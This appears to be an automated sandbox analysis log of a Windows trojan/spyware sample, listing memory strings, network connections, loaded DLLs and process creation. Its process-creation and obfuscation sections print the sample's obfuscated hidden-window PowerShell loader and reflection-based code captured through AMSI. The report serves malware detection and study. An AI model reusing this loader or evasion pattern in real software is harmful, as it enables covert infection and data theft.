            Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comG
            Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comGGI
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000025192000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49897 version: TLS 1.2
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051BA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_004049F90_2_004049F9
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_004064AE0_2_004064AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CCCD861_2_07CCCD86
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272D2786_2_0272D278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_027253626_2_02725362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272C1A26_2_0272C1A2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272C7386_2_0272C738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272C4726_2_0272C472
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272CA086_2_0272CA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272E9886_2_0272E988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02723E186_2_02723E18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272CFAA6_2_0272CFAA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272CCD86_2_0272CCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272F9706_2_0272F970
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272E97A6_2_0272E97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272F9616_2_0272F961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02729DE06_2_02729DE0
            Source: 66776676676.exeStatic PE information: invalid certificate
            Source: 66776676676.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/14@5/5
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404486
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\66776676676.exeFile created: C:\Users\user\AppData\Roaming\chinaJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
            Source: C:\Users\user\Desktop\66776676676.exeFile created: C:\Users\user\AppData\Local\Temp\nstF2DD.tmpJump to behavior
            Source: 66776676676.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\66776676676.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 66776676676.exeReversingLabs: Detection: 39%
            Source: 66776676676.exeVirustotal: Detection: 36%
            Source: C:\Users\user\Desktop\66776676676.exeFile read: C:\Users\user\Desktop\66776676676.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\66776676676.exe "C:\Users\user\Desktop\66776676676.exe"
            Source: C:\Users\user\Desktop\66776676676.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\66776676676.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: justifikationssager.lnk.0.drLNK file: ..\..\..\..\..\Filial195.plo
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: 66776676676.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2439189486.000000000A1E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Printmenu $Playboyen $Burres), (Repeteredes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Deltidsarbejderes164 = [AppDomain]::CurrentDomain.GetAssemblies
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Clammed)), $Vdendesergittes).DefineDynamicModule($Oplserens, $false).DefineType($bandagerede, $Bordvine3, [System.MulticastDelegate])$
            Source: C:\Users\user\Desktop\66776676676.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "
            Source: C:\Users\user\Desktop\66776676676.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CC0FC4 push es; iretd 1_2_07CC0FC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CCB54E push FFFFFF8Bh; iretd 1_2_07CCB551
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CC0D51 push FFFFFF8Bh; iretd 1_2_07CC0D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CC1891 push FFFFFF8Bh; iretd 1_2_07CC189A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CCB648 push FFFFFF8Bh; iretd 1_2_07CCB64B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09633E39 push 8BD38B50h; iretd 1_2_09633E3E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0272891E pushad ; iretd 6_2_0272891F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02728C2F pushfd ; iretd 6_2_02728C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02728DDF push esp; iretd 6_2_02728DE0
            Source: C:\Users\user\Desktop\66776676676.exeFile created: C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
